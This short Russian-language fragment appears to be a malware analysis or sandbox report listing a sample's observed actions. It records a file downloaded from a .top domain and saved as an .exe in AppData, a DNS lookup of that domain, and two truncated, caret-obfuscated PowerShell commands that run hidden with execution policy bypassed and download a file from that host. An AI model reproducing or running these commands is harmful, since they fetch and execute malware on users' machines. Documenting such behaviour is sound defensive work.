Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^w^ersH^eLL.eX^E^ ^-^e^XEc^UTi^ONpOLICY ^B^Ypass -n^OProFIle -W^I^N^DoW^stylE^ hidD^En (^NE^w-obJecT^ S^YS^te^M^.Net.W^E^BC^lI^en^t).d^owN^Lo^Ad^F^ILe^('http://hometowergop....
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "pO^w^ersH^eLL.eX^E^ ^-^e^XEc^UTi^ONpOLICY ^B^Ypass -n^OProFIle -W^I^N^DoW^stylE^ hidD^En (^NE^w-obJecT^ S^YS^te^M^.Net.W^E^BC^lI^en^t).d^owN^Lo^Ad^F^ILe^('http://hometowergop....' (со скрытым окном)